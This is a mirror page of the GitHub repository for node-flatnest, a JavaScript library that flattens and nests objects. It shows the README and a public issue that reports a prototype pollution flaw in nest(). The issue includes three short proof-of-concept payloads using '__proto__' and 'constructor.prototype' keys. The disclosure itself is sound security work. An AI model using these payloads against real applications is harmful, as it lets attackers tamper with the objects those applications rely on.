Git Product home page Git Product logo

node-flatnest's Introduction

flatnest

NPM

Flatten/Nest Javascript objects.

var fn = require("flatnest")

var obj = {
  cat: "meow",
  dog: [{name: "spot"}, {name: "rover"}],
  bird: {type: "parrot", age: 22.3, stats: {weight: 10, height: 15}}
}

var flat = fn.flatten(obj)

/*
{ cat: 'meow',
  'dog[0].name': 'spot',
  'dog[1].name': 'rover',
  'bird.type': 'parrot',
  'bird.age': 22.3,
  'bird.stats.weight': 10,
  'bird.stats.height': 15 }
 */


var nested = fn.nest(flat)

/*
{ cat: 'meow',
  dog: [ { name: 'spot' }, { name: 'rover' } ],
  bird:
   { type: 'parrot',
     age: 22.3,
     stats: { weight: 10, height: 15 } } }
 */

// An internal `seek` function is also exposed:

fn.seek(obj, "bird.stats.height") // 15

API

flatten(object)

Flatten an object to a javascript object with only key: value pairs where values are not complex data types. (e.g. they can be numbers, strings, booleans, but not Objects or Arrays)

Keys are named with paths to where the keys where when nested.

nest(flatObject)

Re-form a flattend object into the nested version. It parses the key paths set during flattening and should end up with the original version. This is not always true depending on what data was present and the original key names chosen.

seek(object, path)

Use the flattened key syntax (e.g. aa.bb[0].cc) to look into a nested object.

NOTES

It attempts to do the right thing in a few cases, such as circular references, and will probably not do what you want if you're using . or [] already in your key names (why would you do that!?!)

Circular example:

var fn = require("flatnest")

var obj = {
  aa: "cat",
}
obj.bb = obj

console.log(obj)

// { aa: 'cat', bb: [Circular] }

// Will insert a string value of [Circular (ref)] pointing to the location this ref was first seen while flattening.
var flat = fn.flatten(obj)

console.log(flat)

// { aa: 'cat', bb: '[Circular (this)]' }

var nested = fn.nest(obj)

// { aa: 'cat', bb: { aa: 'cat', bb: [Circular] } }

console.log(nested)

LICENSE

MIT

node-flatnest's People

Contributors

brycebaril avatar

Stargazers

Roman Kuzmin avatar Misbah Ahmad Chowdhury avatar Daniel Deichfuß avatar Mongrain avatar Pasquale Guglielmi avatar Manuel Vila avatar 姚远 avatar Keith avatar Francois-Guillaume Ribreau avatar timelyportfolio avatar Bogdan Chadkin avatar Joe Spencer avatar Manuel Astudillo avatar palaniraja avatar Derek Reynolds avatar Andrew Sliwinski avatar Nahuel Scotti avatar Damon Oehlman avatar Eugene Marinelli avatar Hugh Kennedy avatar

Watchers

avatar James Cloos avatar Misbah Ahmad Chowdhury avatar

Forkers

tedjt eherve misbah-ahmad

node-flatnest's Issues

Who to contact for security issues

Hey there!

I belong to an open source security research community, and a member (@Sampaguitas) has found an issue, but doesn’t know the best way to disclose it.

If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.

Thank you for your consideration, and I look forward to hearing from you!

(cc @huntr-helper)

Prototype pollution in function insert in file nest.js

Hi, i found the prototype pollution when use function nest() in flatnest/nest.js
Affected versions of this package are vulnerable to Prototype Pollution which can allow an attacker to add/modify properties of the Object.prototype.
the risk locate is in here:

node-flatnest/nest.js

Line 43 in b7d97ec

if (type == "." && parent[key] == null) parent[key] = {}

and the POC is as follow:
the first POC:

var flatnest = require("flatnest")
try {
    flatnest.nest({"__proto__.polluted":"yes!"})
    console.log({}.polluted)  //"yes"
} catch (e) {
}
// the second POC:
try {
    flatnest.nest({"__proto__.polluted":"yes!"})
    console.log({}.polluted)
} catch (e) {
}
// the third  POC:
try {
    flatnest.nest({'constructor.prototype.polluted':"yes!"})
    console.log({}.polluted)
} catch (e) {
}

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.